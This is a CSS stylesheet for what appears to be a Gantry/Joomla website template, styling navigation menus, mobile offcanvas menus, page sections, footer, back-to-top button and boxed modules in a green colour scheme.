.g-menu-hastouch .g-standard .g-sublevel > li.g-menu-item-link-parent > .g-menu-item-container > .g-menu-parent-indicator, .g-menu-hastouch .g-fullwidth .g-sublevel > li.g-menu-item-link-parent > .g-menu-item-container > .g-menu-parent-indicator {
  border-radius: 0;
  padding: 0.1rem;
  margin-top: -0.1rem;
  margin-right: -0.1rem;
}
[dir="rtl"] .g-main-nav .g-sublevel > li.g-parent .g-menu-item-content {
  margin-right: 0;
  margin-left: 2rem;
}
[dir="rtl"] .g-main-nav .g-sublevel > li.g-parent .g-menu-parent-indicator {
  right: auto;
  left: 10px;
  margin-top: 3px;
  -webkit-transform: rotate(180deg);
  -moz-transform: rotate(180deg);
  -ms-transform: rotate(180deg);
  -o-transform: rotate(180deg);
  transform: rotate(180deg);
}
[dir="rtl"] .g-main-nav .g-toplevel > li:last-child {
  margin-right: 5px !important;
  margin-left: 5px !important;
}
[dir="rtl"] .g-main-nav .g-toplevel > li:last-child .g-menu-item-container {
  padding-right: 1rem !important;
}
[dir="rtl"] .g-main-nav .g-fullwidth > .g-dropdown > .g-dropdown-column > .g-grid .g-block {
  border-right: none;
  border-left: 1px solid rgba(255, 255, 255, 0.1);
}
[dir="rtl"] .g-main-nav .g-fullwidth > .g-dropdown > .g-dropdown-column > .g-grid .g-block:last-child {
  border-left: none;
}
#g-navigation .g-main-nav {
  margin: 0;
}
#g-navigation .g-main-nav .g-toplevel > li {
  margin: 0 5px;
  text-transform: uppercase;
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  #g-navigation .g-main-nav .g-toplevel > li {
    margin: 0;
  }
}
#g-navigation .g-main-nav .g-toplevel > li > .g-menu-item-container {
  color: #008056;
  padding: 1rem;
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  #g-navigation .g-main-nav .g-toplevel > li > .g-menu-item-container {
    padding: 0.5rem;
  }
}
@media only all and (max-width: 47.99rem) {
  #g-navigation .g-main-nav .g-toplevel > li > .g-menu-item-container {
    padding: 0.5rem;
  }
}
#g-navigation .g-main-nav .g-toplevel > li > .g-menu-item-container a {
  color: #008056;
}
#g-navigation .g-main-nav .g-toplevel > li > .g-menu-item-container a:hover {
  color: #4f953b;
}
#g-navigation .g-main-nav .g-toplevel > li > .g-menu-item-container .g-menu-parent-indicator:after {
  content: "";
  opacity: 0.75;
  padding: 0.1rem;
  border: 1px solid #dddddd;
  background: #f7f7f7;
  margin-left: 2px;
  border-radius: 4px;
  width: 1.2rem;
  text-align: center;
}
#g-navigation .g-main-nav .g-toplevel > li:hover > .g-menu-item-container, #g-navigation .g-main-nav .g-toplevel > li.active > .g-menu-item-container {
  color: #4f953b;
}
#g-navigation .g-main-nav .g-toplevel > li:hover > .g-menu-item-container > .g-selected, #g-navigation .g-main-nav .g-toplevel > li.active > .g-menu-item-container > .g-selected {
  color: #4f953b;
}
#g-navigation .g-main-nav .g-dropdown {
  text-transform: initial;
  color: #ffffff;
  background: rgba(0, 0, 0, 0.8);
  font-family: "Lato";
  border-radius: 0;
  box-shadow: 0 6px 6px rgba(0, 0, 0, 0.05);
}
#g-navigation .g-main-nav .g-dropdown .g-menu-item-container {
  color: #ffffff;
  padding: 12px 15px;
}
#g-navigation .g-main-nav .g-dropdown li {
  border-bottom: 1px solid rgba(255, 255, 255, 0.1);
}
#g-navigation .g-main-nav .g-dropdown .g-dropdown-column {
  border-bottom: none;
}
#g-navigation .g-main-nav .g-sublevel > li > .g-menu-item-container {
  color: #ffffff;
  font-weight: normal;
}
#g-navigation .g-main-nav .g-sublevel > li > .g-menu-item-container > .g-selected {
  color: #ffffff;
  font-weight: normal;
  background: #4f953b;
}
#g-navigation .g-main-nav .g-sublevel > li:hover > .g-menu-item-container, #g-navigation .g-main-nav .g-sublevel > li.active > .g-menu-item-container {
  background: #4f953b;
  color: #ffffff;
}
#g-navigation .g-main-nav .g-sublevel > li:hover > .g-menu-item-container > .g-selected, #g-navigation .g-main-nav .g-sublevel > li.active > .g-menu-item-container > .g-selected {
  background: #4f953b;
  color: #ffffff;
}
#g-navigation .g-main-nav .g-sublevel > li.active > .g-menu-item-container {
  color: #ffffff;
}
#g-navigation .g-main-nav .g-sublevel > li:last-child {
  border-bottom: none;
}
#g-navigation .g-main-nav .g-sublevel > li.g-menu-item-type-particle:hover > .g-menu-item-container {
  background: inherit;
}
@media only all and (max-width: 47.99rem) {
  #g-navigation .g-menu-block {
    display: none;
  }
}
#g-navigation .g-menu-item-subtitle {
  font-size: 0.75rem;
  font-weight: normal;
  opacity: 1;
  padding-top: 5px;
}
.menu-item-particle a {
  color: #4f953b;
}
.menu-item-particle a:hover {
  color: #008056;
}
#g-offcanvas {
  background: #ffffff;
  width: 17rem;
  color: #959595;
}
#g-offcanvas a {
  color: white;
}
#g-offcanvas a:hover {
  color: #959595;
}
#g-offcanvas h1, #g-offcanvas h2, #g-offcanvas h3, #g-offcanvas h4, #g-offcanvas h5, #g-offcanvas h6, #g-offcanvas strong {
  color: #959595;
}
#g-offcanvas .button {
  background: #282828;
  color: #959595;
}
#g-offcanvas .button:hover {
  background: #353535;
}
#g-offcanvas .button:active {
  background: #1b1b1b;
}
.g-offcanvas-toggle {
  font-size: 1.6rem;
  color: #959595;
  text-align: center;
  top: 0;
  left: initial;
  position: relative;
}
#g-offcanvas #g-mobilemenu-container ul {
  background: #ffffff;
}
#g-offcanvas #g-mobilemenu-container ul > li {
  -webkit-transition: background 0.2s, color 0.2s;
  -moz-transition: background 0.2s, color 0.2s;
  transition: background 0.2s, color 0.2s;
}
#g-offcanvas #g-mobilemenu-container ul > li.g-menu-item-type-particle {
  display: none !important;
}
#g-offcanvas #g-mobilemenu-container ul > li > .g-menu-item-container {
  color: #959595;
  border-bottom: 1px solid #f0f0f0;
}
#g-offcanvas #g-mobilemenu-container ul > li:not(.g-menu-item-type-particle):not(.g-menu-item-type-module):hover, #g-offcanvas #g-mobilemenu-container ul > li:not(.g-menu-item-type-particle):not(.g-menu-item-type-module).active {
  background: #f7f7f7;
}
#g-offcanvas #g-mobilemenu-container ul > li:not(.g-menu-item-type-particle):not(.g-menu-item-type-module):hover > .g-menu-item-container, #g-offcanvas #g-mobilemenu-container ul > li:not(.g-menu-item-type-particle):not(.g-menu-item-type-module).active > .g-menu-item-container {
  color: #626262;
}
#g-offcanvas #g-mobilemenu-container ul > li:not(.g-menu-item-type-particle):not(.g-menu-item-type-module).active > .g-menu-item-container {
  color: #ffffff;
  background: #4f953b;
}
#g-offcanvas #g-mobilemenu-container ul > li.g-menu-item-link-parent > .g-menu-item-container > .g-menu-parent-indicator {
  color: #ffffff;
  background: rgba(0, 0, 0, 0.3);
  -webkit-transition: background 0.2s, color 0.2s, border-color 0.2s;
  -moz-transition: background 0.2s, color 0.2s, border-color 0.2s;
  transition: background 0.2s, color 0.2s, border-color 0.2s;
  border-radius: 0;
  margin: -0.2rem 0 -0.2rem 0.5rem;
  padding: 0.2rem;
}
#g-offcanvas #g-mobilemenu-container ul > li.g-menu-item-link-parent > .g-menu-item-container > .g-menu-parent-indicator:hover {
  background: rgba(0, 0, 0, 0.5);
}
#g-offcanvas #g-mobilemenu-container ul > li.g-menu-item-link-parent > .g-menu-item-container > .g-menu-parent-indicator:after {
  content: "";
  opacity: 0.75;
}
#g-offcanvas #g-mobilemenu-container ul > li.g-parent .g-menu-parent-indicator {
  padding-right: 0.2rem;
}
#g-offcanvas #g-mobilemenu-container ul > li.g-parent .g-menu-parent-indicator:after {
  content: "";
}
#g-offcanvas #g-mobilemenu-container ul .g-dropdown-column {
  width: 17rem;
}
#g-mobilemenu-container {
  margin: -1.563rem;
}
.g-nav-overlay, .g-menu-overlay {
  background: rgba(0, 0, 0, 0.6);
}
@media print {
  #g-offcanvas {
    background: #fff !important;
    color: #000 !important;
  }
}
.g-offcanvas-open.g-offcanvas-css2 .g-offcanvas-left #g-page-surround {
  left: 17rem;
}
.g-offcanvas-open.g-offcanvas-css2 .g-offcanvas-right #g-page-surround {
  right: 17rem;
}
.g-offcanvas-open .g-nav-overlay {
  z-index: 1010;
}
.g-offcanvas-open.g-offcanvas-css2 .g-offcanvas-left #g-header.uk-active, .g-offcanvas-open.g-offcanvas-css2 .g-offcanvas-left #g-top.uk-active {
  margin-left: 17rem;
}
.g-offcanvas-open.g-offcanvas-css2 .g-offcanvas-right #g-header.uk-active, .g-offcanvas-open.g-offcanvas-css2 .g-offcanvas-right #g-top.uk-active {
  margin-left: -17rem;
}
.g-offcanvas-closing.g-offcanvas-css2 .g-offcanvas-left #g-header.uk-active, .g-offcanvas-closing.g-offcanvas-css2 .g-offcanvas-left #g-top.uk-active {
  margin-left: 0;
}
.g-offcanvas-closing.g-offcanvas-css2 .g-offcanvas-right #g-header.uk-active, .g-offcanvas-closing.g-offcanvas-css2 .g-offcanvas-right #g-top.uk-active {
  margin-left: 0;
}
@media (-ms-high-contrast: none), (-ms-high-contrast: active) {
  .g-offcanvas-open .g-nav-overlay {
    z-index: 1010;
  }
  .g-offcanvas-open .g-offcanvas-left #g-header.uk-active, .g-offcanvas-open .g-offcanvas-left #g-top.uk-active {
    margin-left: 17rem;
  }
  .g-offcanvas-open .g-offcanvas-right #g-header.uk-active, .g-offcanvas-open .g-offcanvas-right #g-top.uk-active {
    margin-left: -17rem;
  }
  .g-offcanvas-closing .g-offcanvas-left #g-header.uk-active, .g-offcanvas-closing .g-offcanvas-left #g-top.uk-active {
    margin-left: 0;
  }
  .g-offcanvas-closing .g-offcanvas-right #g-header.uk-active, .g-offcanvas-closing .g-offcanvas-right #g-top.uk-active {
    margin-left: 0;
  }
}
#g-header.uk-active, #g-top.uk-active {
  -webkit-transition: margin 0.3s;
  -moz-transition: margin 0.3s;
  transition: margin 0.3s;
}
.g-nav-overlay, .g-menu-overlay {
  -webkit-transition: opacity 0.3s ease-out 0s, z-index 0s;
  -moz-transition: opacity 0.3s ease-out 0s, z-index 0s;
  transition: opacity 0.3s ease-out 0s, z-index 0s;
}
#g-drawer {
  padding: 3rem 0;
  background-color: #ffffff;
  color: #959595;
}
#g-drawer h1, #g-drawer h2, #g-drawer h3, #g-drawer h4, #g-drawer h5, #g-drawer h6, #g-drawer strong {
  color: #282828;
}
@media print {
  #g-drawer {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-top {
  background-color: #ffffff;
  border-bottom: 1px solid #f0f0f0;
  color: #959595;
  z-index: 1003;
  font-size: 0.81rem;
}
#g-top h1, #g-top h2, #g-top h3, #g-top h4, #g-top h5, #g-top h6, #g-top strong {
  color: #282828;
}
#g-top .g-content {
  padding-top: 0;
  padding-bottom: 0;
  margin-top: 0;
  margin-bottom: 0;
}
#g-top .g-block:last-child {
  text-align: right;
}
#g-top .g-block:first-child {
  text-align: left;
}
#g-top > .g-container {
  position: relative;
}
#g-top .g-main-nav {
  font-size: 0.81rem;
  font-family: "Lato";
}
#g-top .g-main-nav .g-toplevel > li {
  border-right: 1px solid #f0f0f0;
  margin: 0;
  margin-left: -4px;
}
#g-top .g-main-nav .g-toplevel > li:first-child {
  border-left: 1px solid #f0f0f0;
  margin-left: 0;
}
#g-top .g-main-nav .g-toplevel > li:last-child {
  margin-left: -4px;
}
#g-top .g-main-nav .g-toplevel > li:last-child .g-menu-item-container {
  padding: 9.125px 15px;
}
#g-top .g-main-nav .g-toplevel > li > .g-menu-item-container {
  padding: 9.125px 15px;
  line-height: inherit;
  color: #959595;
}
#g-top .g-main-nav .g-toplevel > li > .g-menu-item-container a {
  color: #959595;
}
#g-top .g-main-nav .g-toplevel > li > .g-menu-item-container a:hover {
  color: #4f953b;
}
#g-top .g-main-nav .g-toplevel > li > .g-menu-item-container .g-menu-parent-indicator:after {
  content: "";
  opacity: 0.75;
  border: 1px solid #dddddd;
  background: #f7f7f7;
  margin-left: 5px;
  border-radius: 4px;
  width: 1.5rem;
  text-align: center;
  line-height: 1;
}
#g-top .g-main-nav .g-toplevel > li:hover > .g-menu-item-container {
  color: #4f953b;
}
#g-top .g-main-nav .g-dropdown {
  background: #ffffff;
  border-radius: 0;
  box-shadow: 0 6px 6px rgba(0, 0, 0, 0.05);
}
#g-top .g-main-nav .g-dropdown a {
  color: #959595;
  padding: 9px 15px;
}
#g-top .g-main-nav .g-dropdown li {
  border-bottom: 1px solid #dddddd;
}
#g-top .g-main-nav .g-dropdown .g-dropdown-column {
  border-bottom: none;
}
#g-top .g-main-nav .g-sublevel > li > .g-menu-item-container {
  color: #959595;
  font-weight: normal;
}
#g-top .g-main-nav .g-sublevel > li:hover > .g-menu-item-container {
  background: #dddddd;
  color: #626262;
}
#g-top .g-main-nav .g-sublevel > li:last-child {
  border-bottom: none;
}
#g-top .g-main-nav .g-sublevel > li.g-parent .g-menu-parent-indicator {
  top: 9px;
}
#g-top .g-social a {
  width: 2.5rem;
  text-align: center;
}
@media only all and (max-width: 47.99rem) {
  #g-top .g-social a {
    width: 2rem;
  }
}
#g-top .g-paypaldonate {
  margin: 0;
  text-align: right;
}
#g-top .g-paypaldonate .g-paypaldonate-form .g-paypaldonate-button {
  margin-bottom: -1px;
}
#g-top .g-paypaldonate .g-paypaldonate-form .g-paypaldonate-button .g-paypaldonate-icon {
  padding: 0.75rem;
}
#g-top .g-paypaldonate .g-paypaldonate-form .g-paypaldonate-button input[type="submit"] {
  padding: 0 0.75rem;
}
@media only all and (max-width: 47.99rem) {
  #g-top .size-50 {
    flex-basis: 50%;
  }
}
@media print {
  #g-top {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-header {
  background-color: #ffffff;
  color: #959595;
  position: relative;
  z-index: 2;
  text-align: center;
}
#g-header h1, #g-header h2, #g-header h3, #g-header h4, #g-header h5, #g-header h6, #g-header strong {
  color: #282828;
}
#g-header .g-container {
  position: relative;
}
#g-header .g-content {
  padding-top: 0;
  padding-bottom: 0;
  margin-top: 3rem;
  margin-bottom: 2.5rem;
}
@media print {
  #g-header {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-breadcrumb {
  padding: 1rem 0;
  background-color: #ffffff;
  background-image: url('../../images/bread.png');
  background-repeat: no-repeat;
  background-size: auto;
  background-attachment: scroll;
  color: #959595;
}
#g-breadcrumb h1, #g-breadcrumb h2, #g-breadcrumb h3, #g-breadcrumb h4, #g-breadcrumb h5, #g-breadcrumb h6, #g-breadcrumb strong {
  color: #282828;
}
@media only all and (max-width: 47.99rem) {
  #g-breadcrumb {
    text-align: center;
  }
}
@media print {
  #g-breadcrumb {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-fullwidth {
  padding: 0;
  background-color: #f7f7f7;
  color: #008056;
}
#g-fullwidth > .g-container {
  width: 100%;
  padding: 0;
  margin: 0;
}
#g-fullwidth .g-content {
  padding: 0;
  margin: 0;
}
#g-fullwidth h1, #g-fullwidth h2, #g-fullwidth h3, #g-fullwidth h4, #g-fullwidth h5, #g-fullwidth h6, #g-fullwidth strong {
  color: #282828;
}
@media print {
  #g-fullwidth {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-showcase {
  padding: 3rem 0;
  background-color: #ffffff;
  color: #006142;
}
#g-showcase h1, #g-showcase h2, #g-showcase h3, #g-showcase h4, #g-showcase h5, #g-showcase h6, #g-showcase strong {
  color: #282828;
}
@media print {
  #g-showcase {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-intro {
  padding: 3rem 0;
  background-color: #f7f7f7;
  color: #2b2b2b;
}
#g-intro h1, #g-intro h2, #g-intro h3, #g-intro h4, #g-intro h5, #g-intro h6, #g-intro strong {
  color: #008056;
}
@media print {
  #g-intro {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-feature {
  padding: 3rem 0;
  background-color: #ffffff;
  color: #959595;
}
#g-feature h1, #g-feature h2, #g-feature h3, #g-feature h4, #g-feature h5, #g-feature h6, #g-feature strong {
  color: #68ad53;
}
@media print {
  #g-feature {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-subfeature {
  padding: 3rem 0;
  background-color: #f7f7f7;
  color: #959595;
}
#g-subfeature h1, #g-subfeature h2, #g-subfeature h3, #g-subfeature h4, #g-subfeature h5, #g-subfeature h6, #g-subfeature strong {
  color: #68ad53;
}
@media print {
  #g-subfeature {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-utility {
  padding: 3rem 0;
  background-color: #ffffff;
  color: #959595;
}
#g-utility h1, #g-utility h2, #g-utility h3, #g-utility h4, #g-utility h5, #g-utility h6, #g-utility strong {
  color: #282828;
}
@media print {
  #g-utility {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-maintop {
  padding: 3rem 0;
  background-color: #f7f7f7;
  color: #959595;
}
#g-maintop h1, #g-maintop h2, #g-maintop h3, #g-maintop h4, #g-maintop h5, #g-maintop h6, #g-maintop strong {
  color: #282828;
}
@media print {
  #g-maintop {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-system-messages {
  background-color: #ffffff;
  color: #959595;
}
#g-system-messages h1, #g-system-messages h2, #g-system-messages h3, #g-system-messages h4, #g-system-messages h5, #g-system-messages h6, #g-system-messages strong {
  color: #282828;
}
@media print {
  #g-system-messages {
    background: #fff !important;
    color: #000 !important;
  }
}
#system-message-container #system-message {
  padding: 0;
}
#system-message-container #system-message .alert {
  padding: 25px;
  margin: 4.563rem 1.563rem 0 1.563rem;
}
#system-message-container #system-message .alert .close {
  position: static;
}
#system-message-container #system-message .alert .close:hover {
  text-decoration: none;
}
#system-message-container #system-message .alert p {
  margin: 15px 0 0 0;
}
#g-sidebar {
  padding: 3rem 0;
  background-color: #ffffff;
  color: #959595;
}
#g-sidebar h1, #g-sidebar h2, #g-sidebar h3, #g-sidebar h4, #g-sidebar h5, #g-sidebar h6, #g-sidebar strong {
  color: #282828;
}
#g-sidebar .g-features2-particle .g-features2-particle-item {
  flex-basis: 100%;
  margin-bottom: 1.563rem;
}
#g-sidebar .g-features2-particle .g-features2-particle-item:last-child {
  margin-bottom: 0;
}
#g-sidebar .g-features2-particle .g-features2-particle-title {
  font-size: 1.875rem;
  line-height: 2rem;
}
#g-sidebar .g-features2-particle.style5 .g-features2-particle-icon {
  border-radius: 0px;
  border: 1px solid #dddddd;
}
#g-sidebar .g-features2-particle.style5 .g-features2-particle-title {
  font-size: 1.35rem;
}
@media print {
  #g-sidebar {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-mainbody {
  padding: 3rem 0;
  background-color: #ffffff;
  color: #959595;
}
#g-mainbody h1, #g-mainbody h2, #g-mainbody h3, #g-mainbody h4, #g-mainbody h5, #g-mainbody h6, #g-mainbody strong {
  color: #282828;
}
@media print {
  #g-mainbody {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-aside {
  padding: 3rem 0;
  background-color: #ffffff;
  color: #959595;
}
#g-aside h1, #g-aside h2, #g-aside h3, #g-aside h4, #g-aside h5, #g-aside h6, #g-aside strong {
  color: #282828;
}
#g-aside .g-features2-particle .g-features2-particle-item {
  flex-basis: 100%;
  margin-bottom: 1.563rem;
}
#g-aside .g-features2-particle .g-features2-particle-item:last-child {
  margin-bottom: 0;
}
#g-aside .g-features2-particle .g-features2-particle-title {
  font-size: 1.875rem;
  line-height: 2rem;
}
#g-aside .g-features2-particle.style5 .g-features2-particle-icon {
  border-radius: 0px;
  border: 1px solid #dddddd;
}
#g-aside .g-features2-particle.style5 .g-features2-particle-title {
  font-size: 1.35rem;
}
@media print {
  #g-aside {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-mainbottom {
  padding: 3rem 0;
  background-color: #f7f7f7;
  color: #959595;
}
#g-mainbottom h1, #g-mainbottom h2, #g-mainbottom h3, #g-mainbottom h4, #g-mainbottom h5, #g-mainbottom h6, #g-mainbottom strong {
  color: #282828;
}
@media print {
  #g-mainbottom {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-extension {
  padding: 3rem 0;
  background-color: #ffffff;
  color: #959595;
}
#g-extension h1, #g-extension h2, #g-extension h3, #g-extension h4, #g-extension h5, #g-extension h6, #g-extension strong {
  color: #282828;
}
@media print {
  #g-extension {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-additional {
  padding: 3rem 0;
  background-color: #f7f7f7;
  color: #959595;
}
#g-additional h1, #g-additional h2, #g-additional h3, #g-additional h4, #g-additional h5, #g-additional h6, #g-additional strong {
  color: #282828;
}
@media print {
  #g-additional {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-prebottom {
  padding: 3rem 0;
  background-color: #ffffff;
  color: #959595;
}
#g-prebottom h1, #g-prebottom h2, #g-prebottom h3, #g-prebottom h4, #g-prebottom h5, #g-prebottom h6, #g-prebottom strong {
  color: #282828;
}
@media print {
  #g-prebottom {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-bottom {
  padding: 3rem 0;
  background-color: #f7f7f7;
  color: #959595;
}
#g-bottom h1, #g-bottom h2, #g-bottom h3, #g-bottom h4, #g-bottom h5, #g-bottom h6, #g-bottom strong {
  color: #282828;
}
@media print {
  #g-bottom {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-afterbottom {
  padding: 3rem 0;
  background-color: #ffffff;
  color: #959595;
}
#g-afterbottom h1, #g-afterbottom h2, #g-afterbottom h3, #g-afterbottom h4, #g-afterbottom h5, #g-afterbottom h6, #g-afterbottom strong {
  color: #282828;
}
@media print {
  #g-afterbottom {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-last {
  padding: 3rem 0;
  background-color: #ffffff;
  background-image: url('../../images/doves.png');
  background-repeat: no-repeat;
  background-size: auto;
  background-attachment: scroll;
  background-position: right center;
  color: #959595;
}
#g-last h1, #g-last h2, #g-last h3, #g-last h4, #g-last h5, #g-last h6, #g-last strong {
  color: #008056;
}
@media print {
  #g-last {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-footer {
  padding: 3rem 0;
  background-color: #282828;
  background-image: url('../../images/footer.jpg');
  background-repeat: no-repeat;
  background-size: cover;
  background-attachment: scroll;
  color: #6f6f6f;
}
#g-footer h1, #g-footer h2, #g-footer h3, #g-footer h4, #g-footer h5, #g-footer h6, #g-footer strong {
  color: #ffffff;
}
#g-footer a {
  color: #a2a2a2;
}
#g-footer a:hover {
  color: #ffffff;
}
#g-footer .g-title:before, #g-footer .g-title:after {
  display: none;
}
#g-footer .g-features2-particle .g-features2-particle-item {
  flex-basis: 100%;
  margin-bottom: 1.563rem;
}
#g-footer .g-features2-particle .g-features2-particle-item:last-child {
  margin-bottom: 0;
}
#g-footer .g-features2-particle .g-features2-particle-title {
  font-size: 1.875rem;
  line-height: 2rem;
}
#g-footer .g-features2-particle .g-features2-particle-icon {
  color: #ffffff;
  font-size: 90%;
}
#g-footer .g-social a {
  padding: 0.625rem;
  width: 3rem;
  height: 3rem;
  line-height: 1.5rem;
  color: #959595;
  margin: 0;
  border: none;
  background: rgba(0, 0, 0, 0.2);
  text-align: center;
  -webkit-transition: background 0.2s;
  -moz-transition: background 0.2s;
  transition: background 0.2s;
}
#g-footer .g-social a:first-child {
  border: none;
}
#g-footer .g-social a:hover {
  color: #4f953b;
  background: #ffffff;
}
@media print {
  #g-footer {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-copyright {
  padding: 10px 0;
  background-color: #ffffff;
  color: #959595;
}
#g-copyright h1, #g-copyright h2, #g-copyright h3, #g-copyright h4, #g-copyright h5, #g-copyright h6, #g-copyright strong {
  color: #959595;
}
#g-copyright a {
  color: #4f953b;
}
#g-copyright a:hover {
  color: #c8c8c8;
}
#g-copyright .g-block {
  text-align: center;
}
@media only all and (max-width: 47.99rem) {
  #g-copyright {
    text-align: center;
  }
}
#g-copyright:before {
  left: 50%;
  margin-bottom: -50px;
  content: "";
  position: relative;
  display: block;
  width: 50px;
  height: 50px;
  -webkit-transform: translateX(-50%) rotate(45deg);
  transform: translateX(-50%) rotate(45deg);
  z-index: 10;
}
#g-copyright:before {
  top: -35px;
  background: #ffffff;
}
@media print {
  #g-copyright {
    background: #fff !important;
    color: #000 !important;
  }
}
#g-to-top {
  position: fixed;
  bottom: 0;
  left: 0;
  height: 0;
  width: 0;
}
#g-to-top .style1 #g-totop-button {
  position: fixed;
  bottom: -40px;
  right: 28px;
  background: rgba(0, 0, 0, 0.4);
  color: #ffffff;
  border-radius: 3px;
  padding: 6px 13px;
  z-index: 999;
  outline: none;
  -webkit-transition: all 0.3s cubic-bezier(0.55, 0, 0.1, 1) 0s;
  -moz-transition: all 0.3s cubic-bezier(0.55, 0, 0.1, 1) 0s;
  transition: all 0.3s cubic-bezier(0.55, 0, 0.1, 1) 0s;
}
#g-to-top .style1 #g-totop-button:hover {
  background: #4f953b;
}
@media only all and (max-width: 47.99rem) {
  #g-to-top .style1 #g-totop-button {
    display: none;
  }
}
#g-to-top .style1 #g-totop-button.totopfixed {
  bottom: 28px;
}
#g-to-top .style2 #g-totop-button {
  position: fixed;
  bottom: -40px;
  right: 28px;
  background: rgba(0, 0, 0, 0.4);
  color: #ffffff;
  border-radius: 50%;
  padding: 6px 13px;
  z-index: 999;
  outline: none;
  -webkit-transition: all 0.3s cubic-bezier(0.55, 0, 0.1, 1) 0s;
  -moz-transition: all 0.3s cubic-bezier(0.55, 0, 0.1, 1) 0s;
  transition: all 0.3s cubic-bezier(0.55, 0, 0.1, 1) 0s;
}
#g-to-top .style2 #g-totop-button:hover {
  background: #4f953b;
}
@media only all and (max-width: 47.99rem) {
  #g-to-top .style2 #g-totop-button {
    display: none;
  }
}
#g-to-top .style2 #g-totop-button.totopfixed {
  bottom: 28px;
}
.flush .g-container > .g-grid > .g-block > .g-content {
  margin: 0;
  padding: 0;
}
.text-center .g-title, .title-center .g-title {
  text-align: center;
  margin-bottom: 40px;
}
.text-center .g-title:before, .title-center .g-title:before {
  content: "";
  font-family: "Ionicons";
  font-size: 36px;
  color: #4f953b;
  margin: 0 auto;
  display: block;
}
@media only all and (max-width: 47.99rem) {
  .text-center .g-title:before, .title-center .g-title:before {
    display: none;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .text-center .g-title:before, .title-center .g-title:before {
    width: 80px;
  }
}
.text-center .g-title:after, .title-center .g-title:after {
  display: none;
}
.text-center .g-particle-intro .g-title:before, .text-center .g-particle-intro .g-title:after, .title-center .g-particle-intro .g-title:before, .title-center .g-particle-intro .g-title:after {
  display: none;
}
.title-border .g-title {
  border-bottom: 1px solid #dddddd;
  padding-bottom: 10px;
}
.title-border .g-title:before, .title-border .g-title:after {
  display: none;
}
.title-border .g-particle-intro .g-title {
  border-bottom: none;
  padding-bottom: 0;
}
.title-clean .g-title:before, .title-clean .g-title:after {
  display: none;
}
[class*="box"].g-block > .g-content {
  margin: 1.5625rem;
}
.box1.moduletable, .box1.widget, .box1.g-outer-box, .box1 > .g-content {
  padding: 25px;
  border: 1px solid #dddddd;
  background: #ffffff;
}
.box1.moduletable .g-title, .box1.widget .g-title, .box1.g-outer-box .g-title, .box1 > .g-content .g-title {
  border-bottom: 1px solid #dddddd;
  padding-bottom: 15px;
}
.box1.moduletable .g-title:before, .box1.moduletable .g-title:after, .box1.widget .g-title:before, .box1.widget .g-title:after, .box1.g-outer-box .g-title:before, .box1.g-outer-box .g-title:after, .box1 > .g-content .g-title:before, .box1 > .g-content .g-title:after {
  display: none;
}
.box1.moduletable .g-particle-intro .g-title, .box1.widget .g-particle-intro .g-title, .box1.g-outer-box .g-particle-intro .g-title, .box1 > .g-content .g-particle-intro .g-title {
  margin-bottom: 30px;
}
.box1.moduletable .g-particle-intro .g-title-separator, .box1.widget .g-particle-intro .g-title-separator, .box1.g-outer-box .g-particle-intro .g-title-separator, .box1 > .g-content .g-particle-intro .g-title-separator {
  display: none;
}
.box2.moduletable, .box2.widget, .box2.g-outer-box, .box2 > .g-content {
  padding: 25px;
  border: 1px solid #dddddd;
  background: #f1f1f1;
}
.box2.moduletable .g-title, .box2.widget .g-title, .box2.g-outer-box .g-title, .box2 > .g-content .g-title {
  border-bottom: 1px solid #dddddd;
  padding-bottom: 15px;
}
.box2.moduletable .g-title:before, .box2.moduletable .g-title:after, .box2.widget .g-title:before, .box2.widget .g-title:after, .box2.g-outer-box .g-title:before, .box2.g-outer-box .g-title:after, .box2 > .g-content .g-title:before, .box2 > .g-content .g-title:after {
  display: none;
}
.box2.moduletable .g-particle-intro .g-title, .box2.widget .g-particle-intro .g-title, .box2.g-outer-box .g-particle-intro .g-title, .box2 > .g-content .g-particle-intro .g-title {
  margin-bottom: 30px;
}
.box2.moduletable .g-particle-intro .g-title-separator, .box2.widget .g-particle-intro .g-title-separator, .box2.g-outer-box .g-particle-intro .g-title-separator, .box2 > .g-content .g-particle-intro .g-title-separator {
  display: none;
}
.box3.moduletable, .box3.widget, .box3.g-outer-box, .box3 > .g-content {
  padding: 25px;
  background: #4f953b;
  color: #ffffff;
}
.box3.moduletable .g-title, .box3.widget .g-title, .box3.g-outer-box .g-title, .box3 > .g-content .g-title {
  color: #ffffff !important;
  border-bottom: 1px solid #73bf5d;
  padding-bottom: 15px;
}
.box3.moduletable .g-title:before, .box3.moduletable .g-title:after, .box3.widget .g-title:before, .box3.widget .g-title:after, .box3.g-outer-box .g-title:before, .box3.g-outer-box .g-title:after, .box3 > .g-content .g-title:before, .box3 > .g-content .g-title:after {
  display: none;
}
.box3.moduletable .g-particle-intro .g-title, .box3.widget .g-particle-intro .g-title, .box3.g-outer-box .g-particle-intro .g-title, .box3 > .g-content .g-particle-intro .g-title {
  margin-bottom: 30px;
}
.box3.moduletable .g-particle-intro .g-title-separator, .box3.widget .g-particle-intro .g-title-separator, .box3.g-outer-box .g-particle-intro .g-title-separator, .box3 > .g-content .g-particle-intro .g-title-separator {
  display: none;
}
.box3.moduletable .button, .box3.widget .button, .box3.g-outer-box .button, .box3 > .g-content .button {
  background: #282828;
}
